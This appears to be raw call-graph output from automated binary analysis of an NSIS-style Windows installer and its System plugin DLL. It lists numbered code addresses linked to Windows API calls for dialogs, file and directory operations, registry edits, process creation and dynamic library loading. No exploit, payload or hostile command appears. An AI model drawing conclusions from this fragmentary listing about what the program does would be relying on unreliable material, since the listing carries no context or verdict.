5200->5221 5201->5194 5202 4050f1 SendMessageW 5201->5202 5204 405174 5201->5204 5207 405143 SendMessageW 5201->5207 5208 40512f SendMessageW 5201->5208 5202->5201 5203->5178 5204->5194 5204->5197 5207->5201 5208->5201 5210->5184 5211->5173 5211->5183 5212 4054c5 5214 4054d0 InvalidateRect 5212->5214 5216 4054dc 5212->5216 5215 4053e9 SendMessageW 5213->5215 5217 4053ff 5213->5217 5214->5216 5215->5217 5216->5191 5236 404e49 5216->5236 5217->5212 5219 405473 SendMessageW SendMessageW 5217->5219 5219->5217 5220->5210 5221->5175 5223 404eb1 GetMessagePos ScreenToClient SendMessageW 5222->5223 5224 404eed SendMessageW 5222->5224 5225 404ee5 5223->5225 5226 404eea 5223->5226 5224->5225 5225->5211 5226->5224 5239 406554 lstrcpynW 5227->5239 5229 404f21 5240 40649b wsprintfW 5229->5240 5231 404f2b 5232 40140b 2 API calls 5231->5232 5233 404f34 5232->5233 5241 406554 lstrcpynW 5233->5241 5235 404f3b 5235->5213 5242 404d80 5236->5242 5238 404e5e 5238->5191 5239->5229 5240->5231 5241->5235 5243 404d99 5242->5243 5244 406591 22 API calls 5243->5244 5245 404dfd 5244->5245 5246 406591 22 API calls 5245->5246 5247 404e08 5246->5247 5248 406591 22 API calls 5247->5248 5249 404e1e lstrlenW wsprintfW SetDlgItemTextW 5248->5249 5249->5238 5250 402641 5251 402dcb 22 API calls 5250->5251 5252 402648 5251->5252 5255 406044 GetFileAttributesW CreateFileW 5252->5255 5254 402654 5255->5254 4152 4025c3 4163 402e0b 4152->4163 4156 4025d6 4157 4025f2 RegEnumKeyW 4156->4157 4158 4025fe RegEnumValueW 4156->4158 4161 402953 4156->4161 4160 40261a RegCloseKey 4157->4160 4159 402613 4158->4159 4158->4160 4159->4160 4160->4161 4164 402dcb 22 API calls 4163->4164 4165 402e22 4164->4165 4166 4063c1 RegOpenKeyExW 4165->4166 4167 4025cd 4166->4167 4168 402da9 4167->4168 4169 406591 22 API calls 4168->4169 4170 402dbe 4169->4170 4170->4156 5256 404643 lstrlenW 5257 404662 5256->5257 5258 404664 WideCharToMultiByte 5256->5258 5257->5258 5259 4049c4 5260 4049f0 5259->5260 5261 404a01 5259->5261 5320 405b98 GetDlgItemTextW 5260->5320 5263 404a0d GetDlgItem 5261->5263 5269 404a6c 5261->5269 5265 404a21 5263->5265 5264 4049fb 5267 406802 5 API calls 5264->5267 5268 404a35 SetWindowTextW 5265->5268 5275 405ece 4 API calls 5265->5275 5266 404b50 5318 404cff 5266->5318 5322 405b98 GetDlgItemTextW 5266->5322 5267->5261 5271 4044d3 23 API calls 5268->5271 5269->5266 5272 406591 22 API calls 5269->5272 5269->5318 5276 404a51 5271->5276 5277 404ae0 SHBrowseForFolderW 5272->5277 5273 404b80 5278 405f2b 18 API calls 5273->5278 5274 40453a 8 API calls 5279 404d13 5274->5279 5280 404a2b 5275->5280 5281 4044d3 23 API calls 5276->5281 5277->5266 5282 404af8 CoTaskMemFree 5277->5282 5283 404b86 5278->5283 5280->5268 5286 405e23 3 API calls 5280->5286 5284 404a5f 5281->5284 5285 405e23 3 API calls 5282->5285 5323 406554 lstrcpynW 5283->5323 5321 404508 SendMessageW 5284->5321 5288 404b05 5285->5288 5286->5268 5291 404b3c SetDlgItemTextW 5288->5291 5295 406591 22 API calls 5288->5295 5290 404a65 5293 406948 5 API calls 5290->5293 5291->5266 5292 404b9d 5294 406948 5 API calls 5292->5294 5293->5269 5302 404ba4 5294->5302 5296 404b24 lstrcmpiW 5295->5296 5296->5291 5299 404b35 lstrcatW 5296->5299 5297 404be5 5324 406554 lstrcpynW 5297->5324 5299->5291 5300 404bec 5301 405ece 4 API calls 5300->5301 5303 404bf2 GetDiskFreeSpaceW 5301->5303 5302->5297 5305 405e6f 2 API calls 5302->5305 5307 404c3d 5302->5307 5306 404c16 MulDiv 5303->5306 5303->5307 5305->5302 5306->5307 5308 404e49 25 API calls 5307->5308 5309 404cae 5307->5309 5311 404c9b 5308->5311 5310 404cd1 5309->5310 5312 40140b 2 API calls 5309->5312 5325 4044f5 KiUserCallbackDispatcher 5310->5325 5314 404cb0 SetDlgItemTextW 5311->5314 5315 404ca0 5311->5315 5312->5310 5314->5309 5317 404d80 25 API calls 5315->5317 5316 404ced 5316->5318 5326 40491d 5316->5326 5317->5309 5318->5274 5320->5264 5321->5290 5322->5273 5323->5292 5324->5300 5325->5316 5327 404930 SendMessageW 5326->5327 5328 40492b 5326->5328 5327->5318 5328->5327 4179 4015c8 4180 402dcb 22 API calls 4179->4180 4181 4015cf SetFileAttributesW 4180->4181 4182 4015e1 4181->4182 4183 401fc9 4184 402dcb 22 API calls 4183->4184 4185 401fcf 4184->4185 4198 4055d9 4185->4198 4190 402002 CloseHandle 4194 402953 4190->4194 4193 401ff4 4195 402004 4193->4195 4196 401ff9 4193->4196 4195->4190 4217 40649b wsprintfW 4196->4217 4199 4055f4 4198->4199 4208 401fd9 4198->4208 4200 405610 lstrlenW 4199->4200 4201 406591 22 API calls 4199->4201 4202 405639 4200->4202 4203 40561e lstrlenW 4200->4203 4201->4200 4205 40564c 4202->4205 4206 40563f SetWindowTextW 4202->4206 4204 405630 lstrcatW 4203->4204 4203->4208 4204->4202 4207 405652 SendMessageW SendMessageW SendMessageW 4205->4207 4205->4208 4206->4205 4207->4208 4209 405b37 CreateProcessW 4208->4209 4210 401fdf 4209->4210 4211 405b6a CloseHandle 4209->4211 4210->4190 4210->4194 4212 4069f3 WaitForSingleObject 4210->4212 4211->4210 4213 406a0d 4212->4213 4214 406a1f GetExitCodeProcess 4213->4214 4218 406984 4213->4218 4214->4193 4217->4190 4219 4069a1 PeekMessageW 4218->4219 4220 4069b1 WaitForSingleObject 4219->4220 4221 406997 DispatchMessageW 4219->4221 4220->4213 4221->4219 5332 40554d 5333 405571 5332->5333 5334 40555d 5332->5334 5335 405579 IsWindowVisible 5333->5335 5338 405590 5333->5338 5336 405563 5334->5336 5344 4055ba 5334->5344 5337 405586 5335->5337 5335->5344 5340 40451f SendMessageW 5336->5340 5341 404e8e 5 API calls 5337->5341 5339 4055bf CallWindowProcW 5338->5339 5343 404f0e 4 API calls 5338->5343 5342 40556d 5339->5342 5340->5342 5341->5338 5343->5344 5344->5339 4222 4021cf 4223 402dcb 22 API calls 4222->4223 4224 4021d6 4223->4224 4225 402dcb 22 API calls 4224->4225 4226 4021e0 4225->4226 4227 402dcb 22 API calls 4226->4227 4228 4021ea 4227->4228 4229 402dcb 22 API calls 4228->4229 4230 4021f4 4229->4230 4231 402dcb 22 API calls 4230->4231 4232 4021fe 4231->4232 4233 40223d CoCreateInstance 4232->4233 4234 402dcb 22 API calls 4232->4234 4237 40225c 4233->4237 4234->4233 4236 40231b 4237->4236 4238 401423 4237->4238 4239 4055d9 29 API calls 4238->4239 4240 401431 4239->4240 4240->4236 4241 40254f 4242 402e0b 22 API calls 4241->4242 4243 402559 4242->4243 4244 402dcb 22 API calls 4243->4244 4245 402562 4244->4245 4246 40256d RegQueryValueExW 4245->4246 4250 402953 4245->4250 4247 40258d 4246->4247 4251 402593 RegCloseKey 4246->4251 4247->4251 4252 40649b wsprintfW 4247->4252 4251->4250 4252->4251 5345 40204f 5346 402dcb 22 API calls 5345->5346 5347 402056 5346->5347 5348 406948 5 API calls 5347->5348 5349 402065 5348->5349 5350 402081 GlobalAlloc 5349->5350 5353 4020f1 5349->5353 5351 402095 5350->5351 5350->5353 5352 406948 5 API calls 5351->5352 5354 40209c 5352->5354 5355 406948 5 API calls 5354->5355 5356 4020a6 5355->5356 5356->5353 5360 40649b wsprintfW 5356->5360 5358 4020df 5361 40649b wsprintfW 5358->5361 5360->5358 5361->5353 4281 403fd4 4282 403fec 4281->4282 4283 40414d 4281->4283 4282->4283 4284 403ff8 4282->4284 4285 40415e GetDlgItem GetDlgItem 4283->4285 4294 40419e 4283->4294 4286 404003 SetWindowPos 4284->4286 4287 404016 4284->4287 4288 4044d3 23 API calls 4285->4288 4286->4287 4291 404061 4287->4291 4292 40401f ShowWindow 4287->4292 4293 404188 SetClassLongW 4288->4293 4289 4041f8 4304 404148 4289->4304 4354 40451f 4289->4354 4298 404080 4291->4298 4299 404069 DestroyWindow 4291->4299 4296 40413a 4292->4296 4297 40403f GetWindowLongW 4292->4297 4300 40140b 2 API calls 4293->4300 4294->4289 4295 401389 2 API calls 4294->4295 4301 4041d0 4295->4301 4376 40453a 4296->4376 4297->4296 4303 404058 ShowWindow 4297->4303 4306 404085 SetWindowLongW 4298->4306 4307 404096 4298->4307 4305 40445c 4299->4305 4300->4294 4301->4289 4308 4041d4 SendMessageW 4301->4308 4303->4291 4305->4304 4314 40448d ShowWindow 4305->4314 4306->4304 4307->4296 4311 4040a2 GetDlgItem 4307->4311 4308->4304 4309 40140b 2 API calls 4327 40420a 4309->4327 4310 40445e DestroyWindow EndDialog 4310->4305 4312 4040d0 4311->4312 4313 4040b3 SendMessageW IsWindowEnabled 4311->4313 4316 4040dd 4312->4316 4317 404124 SendMessageW 4312->4317 4318 4040f0 4312->4318 4328 4040d5 4312->4328 4313->4304 4313->4312 4314->4304 4315 406591 22 API calls 4315->4327 4316->4317 4316->4328 4317->4296 4321 4040f8 4318->4321 4322 40410d 4318->4322 4320 4044d3 23 API calls 4320->4327 4370 40140b 4321->4370 4324 40140b 2 API calls 4322->4324 4323 40410b 4323->4296 4326 404114 4324->4326 4326->4296 4326->4328 4327->4304 4327->4309 4327->4310 4327->4315 4327->4320 4345 40439e DestroyWindow 4327->4345 4357 4044d3 4327->4357 4373 4044ac 4328->4373 4330 404285 GetDlgItem 4331 4042a2 ShowWindow KiUserCallbackDispatcher 4330->4331 4332 40429a 4330->4332 4360 4044f5 KiUserCallbackDispatcher 4331->4360 4332->4331 4334 4042cc EnableWindow 4339 4042e0 4334->4339 4335 4042e5 GetSystemMenu EnableMenuItem SendMessageW 4336 404315 SendMessageW 4335->4336 4335->4339 4336->4339 4339->4335 4361 404508 SendMessageW 4339->4361 4362 403fb5 4339->4362 4365 406554 lstrcpynW 4339->4365 4341 404344 lstrlenW 4342 406591 22 API calls 4341->4342 4343 40435a SetWindowTextW 4342->4343 4366 401389 4343->4366 4345->4305 4346 4043b8 CreateDialogParamW 4345->4346 4346->4305 4347 4043eb 4346->4347 4348 4044d3 23 API calls 4347->4348 4349 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4348->4349 4350 401389 2 API calls 4349->4350 4351 40443c 4350->4351 4351->4304 4352 404444 ShowWindow 4351->4352 4353 40451f SendMessageW 4352->4353 4353->4305 4355 404537 4354->4355 4356 404528 SendMessageW 4354->4356 4355->4327 4356->4355 4358 406591 22 API calls 4357->4358 4359 4044de SetDlgItemTextW 4358->4359 4359->4330 4360->4334 4361->4339 4363 406591 22 API calls 4362->4363 4364 403fc3 SetWindowTextW 4363->4364 4364->4339 4365->4341 4368 401390 4366->4368 4367 4013fe 4367->4327 4368->4367 4369 4013cb MulDiv SendMessageW 4368->4369 4369->4368 4371 401389 2 API calls 4370->4371 4372 401420 4371->4372 4372->4328 4374 4044b3 4373->4374 4375 4044b9 SendMessageW 4373->4375 4374->4375 4375->4323 4377 4045fd 4376->4377 4378 404552 GetWindowLongW 4376->4378 4377->4304 4378->4377 4379 404567 4378->4379 4379->4377 4380 404594 GetSysColor 4379->4380 4381 404597 4379->4381 4380->4381 4382 4045a7 SetBkMode 4381->4382 4383 40459d SetTextColor 4381->4383 4384 4045c5 4382->4384 4385 4045bf GetSysColor 4382->4385 4383->4382 4386 4045d6 4384->4386 4387 4045cc SetBkColor 4384->4387 4385->4384 4386->4377 4388 4045f0 CreateBrushIndirect 4386->4388 4389 4045e9 DeleteObject 4386->4389 4387->4386 4388->4377 4389->4388 5362 401a55 5363 402dcb 22 API calls 5362->5363 5364 401a5e ExpandEnvironmentStringsW 5363->5364 5365 401a72 5364->5365 5367 401a85 5364->5367 5366 401a77 lstrcmpW 5365->5366 5365->5367 5366->5367 5368 6a2b103d 5371 6a2b101b 5368->5371 5378 6a2b15b6 5371->5378 5373 6a2b1020 5374 6a2b1027 GlobalAlloc 5373->5374 5375 6a2b1024 5373->5375 5374->5375 5376 6a2b15dd 3 API calls 5375->5376 5377 6a2b103b 5376->5377 5380 6a2b15bc 5378->5380 5379 6a2b15c2 5379->5373 5380->5379 5381 6a2b15ce GlobalFree 5380->5381 5381->5373 4468 4023d7 4469 4023e5 4468->4469 4470 4023df 4468->4470 4471 4023f3 4469->4471 4473 402dcb 22 API calls 4469->4473 4472 402dcb 22 API calls 4470->4472 4474 402dcb 22 API calls 4471->4474 4476 402401 4471->4476 4472->4469 4473->4471 4474->4476 4475 402dcb 22 API calls 4477 40240a WritePrivateProfileStringW 4475->4477 4476->4475 4478 4014d7 4479 402da9 22 API calls 4478->4479 4480 4014dd Sleep 4479->4480 4482 402c4f 4480->4482 5387 402459 5388 402461 5387->5388 5389 40248c 5387->5389 5390 402e0b 22 API calls 5388->5390 5391 402dcb 22 API calls 5389->5391 5392 402468 5390->5392 5393 402493 5391->5393 5395 402dcb 22 API calls 5392->5395 5397 4024a0 5392->5397 5398 402e89 5393->5398 5396 402479 RegDeleteValueW RegCloseKey 5395->5396 5396->5397 5399 402e9d 5398->5399 5401 402e96 5398->5401 5399->5401 5402 402ece 5399->5402 5401->5397 5403 4063c1 RegOpenKeyExW 5402->5403 5404 402efc 5403->5404 5405 402f0c RegEnumValueW 5404->5405 5410 402f2f 5404->5410 5413 402fa6 5404->5413 5406 402f96 RegCloseKey 5405->5406 5405->5410 5406->5413 5407 402f6b RegEnumKeyW 5408 402f74 RegCloseKey 5407->5408 5407->5410 5409 406948 5 API calls 5408->5409 5411 402f84 5409->5411 5410->5406 5410->5407 5410->5408 5412 402ece 6 API calls 5410->5412 5411->5413 5414 402f88 RegDeleteKeyW 5411->5414 5412->5410 5413->5401 5414->5413 4551 40175a 4552 402dcb 22 API calls 4551->4552 4553 401761 SearchPathW 4552->4553 4554 40177c 4553->4554 5415 401d5d 5416 402da9 22 API calls 5415->5416 5417 401d64 5416->5417 5418 402da9 22 API calls 5417->5418 5419 401d70 GetDlgItem 5418->5419 5420 40265d 5419->5420 5421 402663 5422 402692 5421->5422 5423 402677 5421->5423 5425 4026c2 5422->5425 5426 402697 5422->5426 5424 402da9 22 API calls 5423->5424 5435 40267e 5424->5435 5428 402dcb 22 API calls 5425->5428 5427 402dcb 22 API calls 5426->5427 5429 40269e 5427->5429 5430 4026c9 lstrlenW 5428->5430 5438 406576 WideCharToMultiByte 5429->5438 5430->5435 5432 4026b2 lstrlenA 5432->5435 5433 4026f6 5434 40270c 5433->5434 5436 4060f6 WriteFile 5433->5436 5435->5433 5435->5434 5437 406125 5 API calls 5435->5437 5436->5434 5437->5433 5438->5432 5439 403be4 5440 403bef 5439->5440 5441 403bf3 5440->5441 5442 403bf6 GlobalAlloc 5440->5442 5442->5441 4555 4015e6 4556 402dcb 22 API calls 4555->4556 4557 4015ed 4556->4557 4574 405ece CharNextW CharNextW 4557->4574 4559 401656 4561 401688 4559->4561 4562 40165b 4559->4562 4560 405e50 CharNextW 4571 4015f6 4560->4571 4564 401423 29 API calls 4561->4564 4563 401423 29 API calls 4562->4563 4565 401662 4563->4565 4569 401680 4564->4569 4586 406554 lstrcpynW 4565->4586 4568 40166f SetCurrentDirectoryW 4568->4569 4571->4559 4571->4560 4572 40163c GetFileAttributesW 4571->4572 4580 405b1f 4571->4580 4583 405aa8 CreateDirectoryW 4571->4583 4587 405b02 CreateDirectoryW 4571->4587 4572->4571 4575 405eeb 4574->4575 4577 405efd 4574->4577 4575->4577 4578 405ef8 CharNextW 4575->4578 4576 405f21 4576->4571 4577->4576 4579 405e50 CharNextW 4577->4579 4578->4576 4579->4577 4581 406948 5 API calls 4580->4581 4582 405b26 4581->4582 4582->4571 4584 405af4 4583->4584 4585 405af8 GetLastError 4583->4585 4584->4571 4585->4584 4586->4568 4588 405b12 4587->4588 4589 405b16 GetLastError 4587->4589 4588->4571 4589->4588 4590 401966 4591 401968 4590->4591 4592 402dcb 22 API calls 4591->4592 4593 40196d 4592->4593 4596 405c60 4593->4596 4635 405f2b 4596->4635 4599 405c88 DeleteFileW 4606 401976 4599->4606 4600 405c9f 4602 405dca 4600->4602 4649 406554 lstrcpynW 4600->4649 4602->4606 4609 4068b1 2 API calls 4602->4609 4603 405cc5 4604 405cd8 4603->4604 4605 405ccb lstrcatW 4603->4605 4650 405e6f lstrlenW 4604->4650 4607 405cde 4605->4607 4610 405cee lstrcatW 4607->4610 4612 405cf9 lstrlenW FindFirstFileW 4607->4612 4611 405de4 4609->4611 4610->4612 4611->4606 4613 405de8 4611->4613 4614 405dbf 4612->4614 4633 405d1b 4612->4633 4615 405e23 3 API calls 4613->4615 4614->4602 4616 405dee 4615->4616 4618 405c18 5 API calls 4616->4618 4617 405da2 FindNextFileW 4620 405db8 FindClose 4617->4620 4617->4633 4621 405dfa 4618->4621 4620->4614 4622 405e14 4621->4622 4623 405dfe 4621->4623 4625 4055d9 29 API calls 4622->4625 4623->4606 4626 4055d9 29 API calls 4623->4626 4625->4606 4628 405e0b 4626->4628 4627 405c60 65 API calls 4627->4633 4630 406314 41 API calls 4628->4630 4629 4055d9 29 API calls 4629->4617 4631 405e12 4630->4631 4631->4606 4632 4055d9 29 API calls 4632->4633 4633->4617 4633->4627 4633->4629 4633->4632 4654 406554 lstrcpynW 4633->4654 4655 405c18 4633->4655 4663 406314 MoveFileExW 4633->4663 4667 406554 lstrcpynW 4635->4667 4637 405f3c 4638 405ece 4 API calls 4637->4638 4639 405f42 4638->4639 4640 405c80 4639->4640 4641 406802 5 API calls 4639->4641 4640->4599 4640->4600 4647 405f52 4641->4647 4642 405f83 lstrlenW 4643 405f8e 4642->4643 4642->4647 4644 405e23 3 API calls 4643->4644 4646 405f93 GetFileAttributesW 4644->4646 4645 4068b1 2 API calls 4645->4647 4646->4640 4647->4640 4647->4642 4647->4645 4648 405e6f 2 API calls 4647->4648 4648->4642 4649->4603 4651 405e7d 4650->4651 4652 405e83 CharPrevW 4651->4652 4653 405e8f 4651->4653 4652->4651 4652->4653 4653->4607 4654->4633 4656 40601f 2 API calls 4655->4656 4657 405c24 4656->4657 4658 405c45 4657->4658 4659 405c33 RemoveDirectoryW 4657->4659 4660 405c3b DeleteFileW 4657->4660 4658->4633 4661 405c41 4659->4661 4660->4661 4661->4658 4662 405c51 SetFileAttributesW 4661->4662 4662->4658 4664 406335 4663->4664 4665 406328 4663->4665 4664->4633 4668 40619a 4665->4668 4667->4637 4669 4061f0 GetShortPathNameW 4668->4669 4670 4061ca 4668->4670 4672 406205 4669->4672 4673 40630f 4669->4673 4695 406044 GetFileAttributesW CreateFileW 4670->4695 4672->4673 4675 40620d wsprintfA 4672->4675 4673->4664 4674 4061d4 CloseHandle GetShortPathNameW 4674->4673 4676 4061e8 4674->4676 4677 406591 22 API calls 4675->4677 4676->4669 4676->4673 4678 406235 4677->4678 4696 406044 GetFileAttributesW CreateFileW 4678->4696 4680 406242 4680->4673 4681 406251 GetFileSize GlobalAlloc 4680->4681 4682 406273 4681->4682 4683 406308 CloseHandle 4681->4683 4684 4060c7 ReadFile 4682->4684 4683->4673 4685 40627b 4684->4685 4685->4683 4697 405fa9 lstrlenA 4685->4697 4688 406292 lstrcpyA 4691 4062b4 4688->4691 4689 4062a6 4690 405fa9 4 API calls 4689->4690 4690->4691 4692 4062eb SetFilePointer 4691->4692 4693 4060f6 WriteFile 4692->4693 4694 406301 GlobalFree 4693->4694 4694->4683 4695->4674 4696->4680 4698 405fea lstrlenA 4697->4698 4699 405ff2 4698->4699 4700 405fc3 lstrcmpiA 4698->4700 4699->4688 4699->4689 4700->4699 4701 405fe1 CharNextA 4700->4701 4701->4698 5443 6a2b170d 5444 6a2b15b6 GlobalFree 5443->5444 5446 6a2b1725 5444->5446 5445 6a2b176b GlobalFree 5446->5445 5447 6a2b1740 5446->5447 5448 6a2b1757 VirtualFree 5446->5448 5447->5445 5448->5445 5449 401c68 5450 402da9 22 API calls 5449->5450 5451 401c6f 5450->5451 5452 402da9 22 API calls 5451->5452 5453 401c7c 5452->5453 5454 401c91 5453->5454 5455 402dcb 22 API calls 5453->5455 5456 401ca1 5454->5456 5457 402dcb 22 API calls 5454->5457 5455->5454 5458 401cf8 5456->5458 5459 401cac 5456->5459 5457->5456 5461 402dcb 22 API calls 5458->5461 5460 402da9 22 API calls 5459->5460 5463 401cb1 5460->5463 5462 401cfd 5461->5462 5464 402dcb 22 API calls 5462->5464 5465 402da9 22 API calls 5463->5465 5466 401d06 FindWindowExW 5464->5466 5467 401cbd 5465->5467 5470 401d28 5466->5470 5468 401ce8 SendMessageW 5467->5468 5469 401cca SendMessageTimeoutW 5467->5469 5468->5470 5469->5470 5471 4028e9 5472 4028ef 5471->5472 5473 4028f7 FindClose 5472->5473 5474 402c4f 5472->5474 5473->5474 5475 6a2b1000 5476 6a2b101b 5 API calls 5475->5476 5477 6a2b1019 5476->5477 5478 4016f1 5479 402dcb 22 API calls 5478->5479 5480 4016f7 GetFullPathNameW 5479->5480 5481 401733 5480->5481 5482 401711 5480->5482 5483 401748 GetShortPathNameW 5481->5483 5484 402c4f 5481->5484 5482->5481 5485 4068b1 2 API calls 5482->5485 5483->5484 5486 401723 5485->5486 5486->5481 5488 406554 lstrcpynW 5486->5488 5488->5481 5489 401e73 GetDC 5490 402da9 22 API calls 5489->5490 5491 401e85 GetDeviceCaps MulDiv ReleaseDC 5490->5491 5492 402da9 22 API calls 5491->5492 5493 401eb6 5492->5493 5494 406591 22 API calls 5493->5494 5495 401ef3 CreateFontIndirectW 5494->5495 5496 40265d 5495->5496 5497 4014f5 SetForegroundWindow 5498 402c4f 5497->5498 5499 402975 5500 402dcb 22 API calls 5499->5500 5501 402981 5500->5501 5502 402997 5501->5502 5503 402dcb 22 API calls 5501->5503 5504 40601f 2 API calls 5502->5504 5503->5502 5505 40299d 5504->5505 5527 406044 GetFileAttributesW CreateFileW 5505->5527 5507 4029aa 5508 402a60 5507->5508 5509 4029c5 GlobalAlloc 5507->5509 5510 402a48 5507->5510 5511 402a67 DeleteFileW 5508->5511 5512 402a7a 5508->5512 5509->5510 5513 4029de 5509->5513 5514 4032d9 36 API calls 5510->5514 5511->5512 5528 4034e7 SetFilePointer 5513->5528 5516 402a55 CloseHandle 5514->5516 5516->5508 5517 4029e4 5518 4034d1 ReadFile 5517->5518 5519 4029ed GlobalAlloc 5518->5519 5520 402a31 5519->5520 5521 4029fd 5519->5521 5522 4060f6 WriteFile 5520->5522 5523 4032d9 36 API calls 5521->5523 5524 402a3d GlobalFree 5522->5524 5526 402a0a 5523->5526 5524->5510 5525 402a28 GlobalFree 5525->5520 5526->5525 5527->5507 5528->5517 4973 405b7a ShellExecuteExW 5529 40197b 5530 402dcb 22 API calls 5529->5530 5531 401982 lstrlenW 5530->5531 5532 40265d 5531->5532 4974 4020fd 4975 40210f 4974->4975 4985 4021c1 4974->4985 4976 402dcb 22 API calls 4975->4976 4977 402116 4976->4977 4979 402dcb 22 API calls 4977->4979 4978 401423 29 API calls 4980 40231b 4978->4980 4981 40211f 4979->4981 4982 402135 LoadLibraryExW 4981->4982 4983 402127 GetModuleHandleW 4981->4983 4984 402146 4982->4984 4982->4985 4983->4982 4983->4984 4997 4069b7 4984->4997 4985->4978 4988 402190 4990 4055d9 29 API calls 4988->4990 4989 402157 4991 402176 4989->4991 4992 40215f 4989->4992 4993 402167 4990->4993 5002 6a2b1817 4991->5002 4994 401423 29 API calls 4992->4994 4993->4980 4995 4021b3 FreeLibrary 4993->4995 4994->4993 4995->4980 5044 406576 WideCharToMultiByte 4997->5044 4999 4069d4 5000 4069db GetProcAddress 4999->5000 5001 402151 4999->5001 5000->5001 5001->4988 5001->4989 5003 6a2b184a 5002->5003 5045 6a2b1bff 5003->5045 5005 6a2b1851 5006 6a2b1976 5005->5006 5007 6a2b1869 5005->5007 5008 6a2b1862 5005->5008 5006->4993 5079 6a2b2480 5007->5079 5095 6a2b243e 5008->5095 5013 6a2b188e 5014 6a2b18af 5013->5014 5015 6a2b18cd 5013->5015 5108 6a2b2655 5014->5108 5017 6a2b191e 5015->5017 5018 6a2b18d3 5015->5018 5016 6a2b1898 5016->5013 5105 6a2b2e23 5016->5105 5026 6a2b2655 10 API calls 5017->5026 5127 6a2b1666 5018->5127 5020 6a2b1885 5020->5013 5089 6a2b2b98 5020->5089 5021 6a2b187f 5021->5020 5022 6a2b1890 5021->5022 5099 6a2b2810 5022->5099 5031 6a2b190f 5026->5031 5027 6a2b18b5 5119 6a2b1654 5027->5119 5036 6a2b1965 5031->5036 5133 6a2b2618 5031->5133 5033 6a2b1896 5033->5013 5034 6a2b2655 10 API calls 5034->5031 5036->5006 5038 6a2b196f GlobalFree 5036->5038 5038->5006 5041 6a2b1951 5041->5036 5137 6a2b15dd wsprintfW 5041->5137 5042 6a2b194a FreeLibrary 5042->5041 5044->4999 5140 6a2b12bb GlobalAlloc 5045->5140 5047 6a2b1c26 5141 6a2b12bb GlobalAlloc 5047->5141 5049 6a2b1e6b GlobalFree GlobalFree GlobalFree 5050 6a2b1e88 5049->5050 5069 6a2b1ed2 5049->5069 5051 6a2b227e 5050->5051 5058 6a2b1e9d 5050->5058 5050->5069 5053 6a2b22a0 GetModuleHandleW 5051->5053 5051->5069 5052 6a2b1d26 GlobalAlloc 5072 6a2b1c31 5052->5072 5056 6a2b22b1 LoadLibraryW 5053->5056 5057 6a2b22c6 5053->5057 5054 6a2b1d71 lstrcpyW 5060 6a2b1d7b lstrcpyW 5054->5060 5055 6a2b1d8f GlobalFree 5055->5072 5056->5057 5056->5069 5148 6a2b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5057->5148 5058->5069 5144 6a2b12cc 5058->5144 5060->5072 5061 6a2b2318 5063 6a2b2325 lstrlenW 5061->5063 5061->5069 5062 6a2b2126 5147 6a2b12bb GlobalAlloc 5062->5147 5149 6a2b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5063->5149 5067 6a2b2067 GlobalFree 5067->5072 5068 6a2b21ae 5068->5069 5076 6a2b2216 lstrcpyW 5068->5076 5069->5005 5070 6a2b22d8 5070->5061 5077 6a2b2302 GetProcAddress 5070->5077 5071 6a2b233f 5071->5069 5072->5049 5072->5052 5072->5054 5072->5055 5072->5060 5072->5062 5072->5067 5072->5068 5072->5069 5073 6a2b12cc 2 API calls 5072->5073 5074 6a2b1dcd 5072->5074 5073->5072 5074->5072 5142 6a2b162f GlobalSize GlobalAlloc 5074->5142 5076->5069 5077->5061 5078 6a2b212f 5078->5005 5081 6a2b2498 5079->5081 5080 6a2b12cc GlobalAlloc lstrcpynW 5080->5081 5081->5080 5083 6a2b25c1 GlobalFree 5081->5083 5084 6a2b256b GlobalAlloc CLSIDFromString 5081->5084 5085 6a2b2540 GlobalAlloc WideCharToMultiByte 5081->5085 5088 6a2b258a 5081->5088 5151 6a2b135a 5081->5151 5083->5081 5086 6a2b186f 5083->5086 5084->5083 5085->5083 5086->5013 5086->5016 5086->5021 5088->5083 5155 6a2b27a4 5088->5155 5091 6a2b2baa 5089->5091 5090 6a2b2c4f CreateFileA 5094 6a2b2c6d 5090->5094 5091->5090 5093 6a2b2d39 5093->5013 5158 6a2b2b42 5094->5158 5096 6a2b2453 5095->5096 5097 6a2b1868 5096->5097 5098 6a2b245e GlobalAlloc 5096->5098 5097->5007 5098->5096 5103 6a2b2840 5099->5103 5100 6a2b28db GlobalAlloc 5104 6a2b28fe 5100->5104 5101 6a2b28ee 5102 6a2b28f4 GlobalSize 5101->5102 5101->5104 5102->5104 5103->5100 5103->5101 5104->5033 5107 6a2b2e2e 5105->5107 5106 6a2b2e6e GlobalFree 5107->5106 5162 6a2b12bb GlobalAlloc 5108->5162 5110 6a2b270b lstrcpynW 5117 6a2b265f 5110->5117 5111 6a2b26fa StringFromGUID2 5111->5117 5112 6a2b26d8 MultiByteToWideChar 5112->5117 5113 6a2b271e wsprintfW 5113->5117 5114 6a2b2742 GlobalFree 5114->5117 5115 6a2b2777 GlobalFree 5115->5027 5116 6a2b1312 2 API calls 5116->5117 5117->5110 5117->5111 5117->5112 5117->5113 5117->5114 5117->5115 5117->5116 5163 6a2b1381 5117->5163 5167 6a2b12bb GlobalAlloc 5119->5167 5121 6a2b1659 5122 6a2b1666 2 API calls 5121->5122 5123 6a2b1663 5122->5123 5124 6a2b1312 5123->5124 5125 6a2b131b GlobalAlloc lstrcpynW 5124->5125 5126 6a2b1355 GlobalFree 5124->5126 5125->5126 5126->5031 5128 6a2b169f lstrcpyW 5127->5128 5129 6a2b1672 wsprintfW 5127->5129 5132 6a2b16b8 5128->5132 5129->5132 5132->5034 5134 6a2b2626 5133->5134 5135 6a2b1931 5133->5135 5134->5135 5136 6a2b2642 GlobalFree 5134->5136 5135->5041 5135->5042 5136->5134 5138 6a2b1312 2 API calls 5137->5138 5139 6a2b15fe 5138->5139 5139->5036 5140->5047 5141->5072 5143 6a2b164d 5142->5143 5143->5074 5150 6a2b12bb GlobalAlloc 5144->5150 5146 6a2b12db lstrcpynW 5146->5069 5147->5078 5148->5070 5149->5071 5150->5146 5152 6a2b1361 5151->5152 5153 6a2b12cc 2 API calls 5152->5153 5154 6a2b137f 5153->5154 5154->5081 5156 6a2b2808 5155->5156 5157 6a2b27b2 VirtualAlloc 5155->5157 5156->5088 5157->5156 5159 6a2b2b4d 5158->5159 5160 6a2b2b5d 5159->5160 5161 6a2b2b52 GetLastError 5159->5161 5160->5093 5161->5160 5162->5117 5164 6a2b138a 5163->5164 5165 6a2b13ac 5163->5165 5164->5165 5166 6a2b1390 